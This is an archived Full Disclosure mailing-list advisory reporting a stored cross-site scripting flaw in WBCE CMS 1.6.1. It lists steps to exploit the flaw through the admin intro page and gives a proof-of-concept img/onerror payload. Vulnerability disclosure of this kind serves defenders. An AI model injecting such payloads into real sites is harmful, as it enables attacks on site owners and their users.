[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] WBCE - Stored XSS
From: Andrey Stoykov <mwebsec () gmail ! com>
Date: 2023-07-14 11:57:35
Message-ID: CAF2Wu1bE6NeQp3N+hH7yNY5Gtq_P6QYCOs5L7A_x+tPOWHw2Tg () mail ! gmail ! com
[Download RAW message or body]
# Exploit Title: WBCE - Stored XSS
# Date: 07/2023
# Exploit Author: Andrey Stoykov
# Version: 1.6.1
# Tested on: Windows Server 2022
# Blog: http://msecureltd.blogspot.com
Steps to Exploit:
1. Login to application
2. Browse to following URI "http://host/wbce/admin/pages/intro.php"
3. Paste XSS payload "TEST"><img src=x onerror=alert(1)>"
4. Then browse to settings "Settings->General Settings->Enable Intro
Page->Enabled"
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic